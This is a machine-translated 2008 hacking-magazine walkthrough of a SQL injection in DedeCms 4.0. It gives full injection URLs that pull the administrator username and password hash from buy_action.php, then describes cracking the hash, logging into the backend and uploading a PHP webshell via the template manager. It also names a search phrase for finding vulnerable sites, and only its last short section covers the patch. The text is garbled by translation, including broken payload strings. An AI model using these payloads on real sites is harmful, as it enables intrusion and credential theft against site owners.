Author: hackest [H. S. T]
This article has been published in the hacker X-Files for 2 0 0 8 years No. 4 magazine After the author published on the blog, such as reproduced please retain this information!
DedeCms i.e. woven dream content management system, and its latest version has been released to 5. 0, but this time the vulnerability is only for OX V4. 0 version effective. 漏洞 文件 为 buy_action.php the file in the pid the value of the transfer does not do sufficient filtering, resulting in aSQL injectionthe vulnerability of generation. Go to the official website to download the latest version of OX V4. 0, the local erection of the environmental testing. This article focuses on the vulnerability of the use of the process, as the vulnerability of the specific causes will not be discussed in detail, interested friends can be self-reading exploit file code. Can by search the keyword“Power by DedeCms”find the extensive use of this program website.
A, registered user
The machine registered address: http://127.0.0.1/dedecms/member/index_do.php?fmdo=user&dopost=regnew, fill in the relevant information, to register, as shown in Figure 1.
Second, the squib administrator user name
Registered well after login the system, submit the following address to direct squib administrator user name: http://127.0.0.1/dedecms/member/buy_action.php?product=member&pid=1%20and%2 0 1=1 1%20union%20select%201,2,userid,4,5%20from%2 0% 2 3@__admin/* Successfully broke up the Administrator's user name hackest, such as in Figure 2.
Third, the squib administrator password
Next is the direct squib administrator password for the MD5 value, and submitted to the following address: http://127.0.0.1/dedecms/member/buy_action.php?product=member&pid=1%20and%2 0 1=1 1%20union%20select%201,2,substring(pwd,9,1 6),4,5%20from%2 0% 2 3@__admin/* Successfully broke the Administrator's password MD5 value eee01c9ab7267f25, such as in Figure 3.
Fourth, the Sign in the background to get Webshell
How, very simple right? Here it is already possible to get the MD5 value directly to query the password plaintext, here's the eee01c9ab7267f25 reduced to plaintext that is the hackest of. Next on the Sign in the background to get Webshell. Backstage login address is in the URL after dede will automatically jump to the background of the login page: the http://127.0.0.1/dedecms/dede/login.php?gotopage=%2Fdedecms%2Fdede%2F Username and password are hackest, and successfully logged in the background, as shown in Figure 4.
Then open the“template Manager”page, upload your PHP mA can be, as shown in Figure 5.
Directly in the background click on the file access to jump to Webshell login entry, enter the password into the CAN, as shown in Figure 6.
The entire process is very simple, basically no technical content at all. If newbies think the manual is very troublesome, then, may wish to try next for this vulnerability to use the tool, the interface is shown in Figure 7.
How nice right, from the registration to login to the backend of the“one-stop”feature!
Five, bug fixes
The official has been given a patch, but not integrated into 4. 0 Installer package inside it, with the patch bag of the buy_action. php file to overwrite the original file.